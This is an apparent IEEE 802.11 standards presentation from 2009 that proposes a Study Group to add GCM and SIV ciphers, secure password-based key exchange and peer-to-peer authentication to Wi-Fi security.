A Study Group for Enhanced 802.11 Security

1. A Study Group for Enhanced 802.11 Security Authors: Date: 2009-03-13 Dan Harkins, Aruba Networks

2. Abstract This presentation makes the case for formation of a Study Group on Enhanced Security for 802.11. Dan Harkins, Aruba Networks

3. 802.11 Security is Not Complete • Enterprise security is there but we have failed to provide technology to secure other use cases. • Attacks against known flaws generate bad press for 802.11 • It’s either simple to deploy or secure, but not both. • Updates to 802.11 security are needed • Faster and more efficient algorithms • Enhancements to prevent known and published attacks– allow for passwords to be used securely. • Improvements to support more usable, robust and secure 802.11 networks. • There is a market for deployments that are problematic today • No 802.1x, no centralized AAA server • Easy to configure, easy to deploy, robust but is still secure • Secure password-based authentication Dan Harkins, Aruba Networks

4. What is the Problem? • New ciphers have been designed that are better than CCM, the one used in 802.11 today. • GCM: provides higher throughput and less power consumption than CCM • SIV: provides misuse-resistance and is more generally useful than CCM. • Strong security is only possible when using 802.1x but that is not appropriate for all use cases and is complex to deploy. • Passwords are easy to use but 802.11 does not define how to use them securely. • There is a market for peer-to-peer applications but 802.1x is a pure client/server protocol. • Other organizations want to address these shortcomings but their attempts are complicated, insecure, or both. • There is at least one feature in 802.11 that needs security but no existing Task Group has the scope to take on that work. • IEEE 802.11 does not have a way to add small featurettes such as these to the standard. Dan Harkins, Aruba Networks

5. What’s the Solution? • A Study Group to define a PAR and 5C for a new Task Group that will address these issues. • Define how GCM and SIV are used to protect an 802.11 frame. • Define how to use a secure password-authenticated key exchange from TGs more generally in 802.11, for ESS, IBSS, mesh, and any other peer-to-peer application. • Develop a peer-to-peer variant of an existing certificate-based key exchange (e.g. DHKE-1) that is appropriate for ESS, IBSS, mesh, and any other peer-to-peer application. • Address the security of TGv’s location service. • Most of this has already been developed, it just needs to be defined for 802.11 • A constrained scope would ensure timely results. Dan Harkins, Aruba Networks

6. What’s the Benefit and Why Should I Care? • Network deployment can be simple yet secure if: • Passwords are used with a protocol implementing a zero-knowledge proof. This would be resistant to attack where RSN PSK is not. • Authentication is done using authentication frames! • Protocols are specified in a peer-to-peer fashion. • STAs can authenticate each other directly, no AAA needed! • Less power consumption means longer battery life, and it’s green. • 802.11 will be applicable for more use cases while still providing strong security. This improves the end-user experience and customer experience with 802.11 gear which can result in better and wider deployments of 802.11 which benefits us all! Dan Harkins, Aruba Networks

7. References • NIST SP800-38D • P. Rogaway and T. Shrimpton, “Deterministic Authenticated Encryption, A Provable Security Treatment of the Key-Wrap Problem”, Advances in Cryptology– EUROCRYPT ’06, St. Petersburg, Russia, 2006. • RFC 5297 • D. Harkins, “Simultaneous Authentication of Equals: A Secure, Password-Based Key Exchange for Mesh Networks”, Proceedings of the 2008 Second International Conference on Sensor Technologies and Applications, Cap Esterel, France, 2008. • V. Shoup, “On Formal Models for Secure Key Exchange”. ACM Computer and Communications Security Conference, 1999. Dan Harkins, Aruba Networks